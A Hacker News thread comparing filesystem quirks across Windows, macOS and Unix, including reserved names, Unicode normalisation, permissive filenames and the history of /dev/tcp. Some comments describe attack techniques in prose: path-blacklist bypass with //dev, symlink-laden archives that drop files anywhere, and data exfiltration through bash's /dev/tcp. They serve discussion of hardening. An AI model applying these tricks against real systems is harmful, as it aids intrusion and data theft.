Hacker News new | past | comments | ask | show | jobs | submit login

If you think Microsoft supports features long-term out of lazyness then you haven't been paying attention. It's a very deliberate choice that helped them grow their business and keep customers.

Transitions are nice from a development perspective but I can guarantee you'll never hear someone who uses your library happy that they need to rewrite parts of it.

Also Windows doesn't have a monopoly bizarre filenames/features/etc you can find plenty of things in the nix family as well.

Lastly, Rust is one of the few projects I've seen that has phenomenal Windows support. It's something that's really appreciated and is going to help them capture markets that other software won't.

> If you think Microsoft supports features long-term out of lazyness then you haven't been paying attention.

Misreading. GP talked about MS's lazy long term users, "lazy" applies to the users not to Microsoft.

> Also Windows doesn't have a monopoly bizarre filenames/features/etc you can find plenty of things in the nix family as well.

Like what? I'm not aware of special file names in arbitrary directories. Only in known/documented ones like /proc or /dev.

I'd say *nix OSes are too lax in what they allow as anything without a zero byte is valid.

In the order I happen to think of them: Filenames may be straightforward on the filesystem level, but a lot of UNIX programs do weird things with them. Many programs use "-" to mean STDIN or STDOUT as appropriate where it is used. Bash has a somewhat ill-conceived feature where it synthesizes a /dev/tcp/$host/$port filesystem that will write to TCP or UDP sockets. Most people don't know about this, a few people think it's a UNIX feature rather than a bash-ism.

The fact that multiple /s will be normalized to be the same as one sometimes trips up security code or code trying to validate that some particular file isn't used (i.e., checking that the filename doesn't start with /dev or a list of other blacklisted directories will fail if the user passes //dev).

Symlinks! Oh, gosh, symlinks. Were this not a stream-of-consciousness dump they probably should come first. You can do terrible things with symlinks, like upload a tarball or zip file that creates a symlink to an arbitrary location in the system, then use that symlink reference as a directory reference to plop a file down. (Some archivers prevent this, others don't.)

Also, /dev is just a convention, it's possible to place device nodes anywhere you want.

You can also pretty much mount arbitrary things in arbitrary places via bind mounts. Hard links can also cause some fun with code that assumes file systems aren't cyclic. Windows technically has a lot of these features but they're harder to get to and less well known whereas UNIX uses the various links in base Linux installs and they're readily available.

Is there any particular reason not to have something like /dev/tcp as a real filesystem, rather than a pretend game that bash likes to play?

There were several implementations of that idea in the early 1980s. The following paper describes one of them.

More Taste: Less Greed? or Sending UNIX to the Fat Farm[0] describes a V7 derivative that had /dev/deuna, /dev/arp, /dev/ip, and /dev/udp.

[0] http://www.collyer.net/who/geoff/taste.pdf

Not much details though. Oh well.

The code in Research Unix V8, V9, and V10 is available. Alcaltel-Lucent made them public a couple months ago[0]. Here are the relevant URLs and file paths within the archives. I already had them on my hard drive and it was easy to grep them. I removed a few columns from the output of tar.



  12738 Jul 25  1985 usr/sys/inet/tcp_device.c


  13461 Aug  6  1986 ./sys/inet.old/old/tcp_device.c
  13457 Feb  3  1987 ./sys/inet.old/tcp_device.c
  13457 Feb 24  1987 ./sys/inet/tcp_device.c


  13542 Feb 20  1990 lsys/inet/tcp_device.c
  13622 Mar  9  1992 sys/inet/tcp_device.c

Edited to fix formatting.

Oh, nice! But I can't find the right man page.

V8 doesn't have a /dev/tcp man page but the interface is documented at /usr/include/sys/inet/tcp_user.h[0].

Here are the commands I used to identify the right file.

find . -type f -print0 | xargs -0 grep -I "/dev/tcp" | less

[0] https://pastebin.com/8RT5vpH6

Edited to add the command sequence for the historical record.

Edited again to fix wording of the first sentence.

That's not very documented. How would someone use this?

V10 has a man page. Extract v10src.tar and look at man/adm/man4/tcp.4.

Okay, this I took a quick look at it, and this seems way to awkward to use from a shell script. It's pretty much C only. I guess Plan 9 does better.


Actually, the stronger case is that the feature should be removed from bash. While it's hard to point at a specific security guarantee that UNIX makes that bash violates by making TCP available via the psuedo-file system, it is a non-trivial ambient contribution to general insecurity for UNIX systems. (People itching to reply to that sentence, please parse it carefully first; I chose the adjectives quite carefully. In particular, I did not just call UNIX "generally insecure".)

I find this surprising. If someone can run bash, they can do anything anyway. What am I missing?

Sometimes you don't get to "run bash", but just pass certain parameters, or add things on the end, or whatever other monstrosity an application programmer comes up with to use bash to do something. This allows you to do things like potentially redirect files to sockets of your choice, where you might exfiltrate data, or provide unexpected data to internal processes.

You would be correct in then pointing out that if you pass user parameters to bash without treating them as carefully as you'd treat radioactive waste, you're asking for trouble, and that /dev/tcp doesn't offer much than the various "nc"s don't. That's why I was sort of non-committal about condemning them; it's not like they are a massive breach of security. It's just one more thing that can surprise people if they're trying to lock a system down, and that's already a pretty long list. And since it's not clear to me that it could ever be a short list, that's why I wanted to emphasize I wasn't trying to condemn UNIX. It's just that it's a feature that doesn't add much but complexity to bash, while not really offering any functionality that isn't better done with nc or something, and on the balance, probably ought to just be removed from an already complicated and security-sensitive program.

I don't know about radioactive waste, but surely allowing untrusted user input into /dev is unrealistically sloppy. (Famous last words?)

I agree that having this as a bash feature versus just using nc doesn't seem to buy much. But I think having these in the actual file system is useful. So why not do both: expunge them from bash, and get them into /dev (or maybe /net, or wherever they belong).

Symlinks are a poor example, IMO. Yes, they need to be carefully handled for security reasons. But they also offer great flexibility that is actually widely used, and that wouldn't be available through other mechanisms.

To paraphrase: Windows NUL is a poor example, IMO. Yes, it needs to be carefully handled for reasons. But it also offers great flexibility that is actually widely used, and that wouldn't be available through other mechanisms.

I rest my case. ;-)

While your reply is genuinely amusing (thank you), how is it actually true?

What do we gain from having NUL everywhere, as opposed to having it in only one specific location, e.g. root?

Also, as an aside, I thought it wasn't a magic file (nul), but rather a magic device (NUL:), which IMO makes a lot of sense.

But that's just not true. They offer less flexibility that would be available through a special namespace prefix like /dev.

It doesn't offer great flexibility though. It has characteristics that made it useful on ancient versions of DOS and now it only offers annoyances that we have to deal with.

Just look at Mac OS X, which is also from the Unix family. It has the feature of decomposing precomposed characters in file names, so if your software writes a file named "café" (caf\xc3\xa9), and later lists the directory, it will find a file named "café" (cafe\xcc\x81). That tends to confuse software which expects to find a file with the same name after creating it, like for instance git.

For a while, if you were in a team in which some developers were on Linux and others were on Mac OS X, and someone on the Linux side checked in a file named with a diacritic, on the Mac OS X side the file appeared to have been deleted (and a new untracked file with the "same name" appeared). Later git grew special code to work around this misfeature.

And yes, Linux has the "bizarre feature" of being way too permissive. A filename is a sequence of bytes of which only the null byte and the slash are forbidden, and only a single or double dot have special meaning; one can have files named with control characters, and/or with something which is not valid for the current character encoding (LC_CTYPE), leading to pain for languages which insist that a string must be always valid Unicode (this includes Rust).

But yeah, nothing compares to the madness that is forbidding simple names like "nul" or "con" or "aux" (alone or followed by any extension) in every single directory, made worse by the fact that you can create files with these names if you use a baroque escaping syntax (which is not available for every API), confusing every other program which does not carefully do the same.

And let's not forget about the fact that the file you just created might not be readable or writable the next instant, because some other process (usually some sort of "antivirus") decided to open it in a exclusive mode. I've seen several projects add retry loops when opening (or moving, or deleting) a file on Windows, to work around that issue.

> It has the feature of decomposing precomposed characters in file names

I was under the impression that the new APFS stopped trying to understand bytes in filenames at all, thereby switching from 'confusion' to [tableflip] as a policy (which is likely an improvement, but also amuses me on the basis it's nice to know [tableflip] is about the only response anybody has to certain unicode-isms)

(note that rust just requires the built-in string type to be valid Unicode, you are free to manipulate other kinds of strings, which is exactly how the os string problem is solved. Also gives you a chance to explicitly handle the errors.)

    And let's not forget about the fact that the file you just
    created might not be readable or writable the next instant
    because some other process (usually some sort of
    "antivirus") decided to open it in a exclusive mode.
THIS. Spent quite a long time trying to reproduce a Windows-only bug with the old Rails 2 gem unpacker caused by exactly this; the code would create a directory "foo-1.2.3" and then immediately try to write files to it and fail because of an exclusive lock - on an empty directory.

Exclusive mode is useful when used for good reasons - i.e. to get snapshot semantics (no-one else can change this) while reading, or implement atomic changes (no-one else can see the change halfway) when writing.

The problem on Windows is that too many APIs decided that exclusive should be the default mode if none is specified - which is the safer choice in a sense that it gives the most guarantees (and the least surprise) to the caller, but arguably the adverse effects it causes on other apps are more surprising and harmful in the end.

I agree with pain-points that you described.

Each OS has it's set of weird, broken and surprising behavior. Most of it in the name of backwards compatibility. There is a group of people that see one mess bearable while the all others totally brain-dead. There are other groups that have somewhat different opinion.

Everything sucks. Which one sucks less? I pick the one that I know more about.

Note that many OS operations in general require retry loops on POSIX systems.

Well, Windows technically supports files with the reserved names - if you use the right APIs - but they break many programs including Explorer. You could make an analogy to Unix filenames with spaces or newlines, which can be created but don't work properly with some tools. (For spaces, try 'make CFLAGS="-I/path/with spaces/"' - there is no way to escape it or otherwise make it work. Newlines break a lot of stuff.)

IIRC you can `make "CFLAGS=-I/path/with spaces/"`

That doesn't make a difference - regardless of where you put the opening quote, make gets the string "CFLAGS=-I/path/with spaces" as argv[1]. The quotes do help, as otherwise it gets split up into multiple arguments to make.

But actually, I was wrong - GNU make passes strings to execute to the shell, so you can use nested quotes: CFLAGS='"-I/path/with/spaces"'. Not sure why I thought differently. The shell itself doesn't work this way, though: when it splits a variable into multiple arguments, it just splits by spaces rather than doing any fancier processing. So there are issues with shell scripts.

The windows command line client for PostgreSQL used to produce confusing errors on my machine because my development source code directory happened to be called "C:\dev"

What constitutes "bizarre" depends a lot on what your prior assumptions are.

Registration is open for Startup School 2019. Classes start July 22nd.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact